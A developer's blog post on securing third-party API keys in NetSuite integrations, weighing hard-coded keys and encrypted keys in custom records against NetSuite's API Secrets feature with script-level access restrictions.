Credential Shield: Securing Third-Party App Access in NetSuite

When I started out as a NetSuite developer, integrating with third-party applications like Amazon, Shopify, and WMS was a common aspect of my projects. One of my major concerns was securing the credentials used in these integrations, as they have the potential to manipulate data across these platforms.

Today, we’re discussing best practices to ensure that these credentials don’t fall into the wrong hands. With knowledge of the API and credentials, malicious actors could wreak havoc on a business.

Hard-Coding Practice

Risk: Hard-coding API keys directly into source code is a risky practice. If the code is exposed, the API keys can be easily copied and misused.

Mitigation: When deploying as part of a SuiteBundle or SuiteApp, ensure that files containing sensitive information are locked and hidden to prevent unauthorized access.

Risk: Hard-coding API keys directly into source code is a risky practice. If the code is exposed, the API keys can be easily copied and misused.

Mitigation: When deploying as part of a SuiteBundle or SuiteApp, ensure that files containing sensitive information are locked and hidden to prevent unauthorized access.

Storing Encrypted API Keys

To enhance security, consider encrypting your API keys before storing them. Here’s a basic example of encrypting an API key in a user event beforeLoad().

1. Encrypt: Encrypt the API key using an encryption key that only your application knows.

2. Store: Save the encrypted API key in a custom record.

3. Retrieve: Decrypt the API key using your encryption key when needed, then use it for your request.

Demo video here: Get Giphy via Encrypted Key

Risk: The encryption key could be exposed in the source code, making it vulnerable to reverse engineering. If the decrypted API key is logged, it may be at risk of compromise.

Mitigation: When deploying a SuiteBundle or SuiteApp, make sure to secure and hide any files that contain encryption keys to safeguard against unauthorized access.

‍NetSuite API Secrets

NetSuite has introduced a feature to address security concerns regarding sensitive data: API Secrets.

1. Store API key via API Secret



• Navigate to Setup > Company > API Secrets > New
• Paste your API key into the Password field.
• Check Allow for All Scripts and Allow for All Domains.
  

2. Retrieve the API Key: Use https.createSecureString() to access the API key securely.

Demo video here: Get Giphy via Secret

Limit Access to API Secret (Optional)

To ensure that API Secrets are only accessible to authorized scripts, follow these steps:

1. Navigate to the API Secret: Go to Setup > Company > API Secrets and select the API Secret you have created.

2. Set Restrictions:

• Click on the Restrictions tab.
• Enter the Script ID of the specific script that should have access to this API Secret. This ensures that only the designated script can retrieve the API Secret, enhancing security by limiting access.

Demo Video for Unauthorized: Get Giphy via Secret - Unauthorized Script

Risk: This approach appears to carry minimal risk. The API key is not easily accessible, and attempts to log the URL value return an empty object, adding an extra layer of security.

Final Thoughts

NetSuite API Secrets deliver a powerful means of securing sensitive information and enhance the NetSuite security toolkit. I highly recommend using this native feature, as it offers an easy and effective way to manage API credentials with less complexity than conventional encryption methods.

To see the complete SuiteScript code and implementation details discussed in this article, visit Jona's GitHub repository.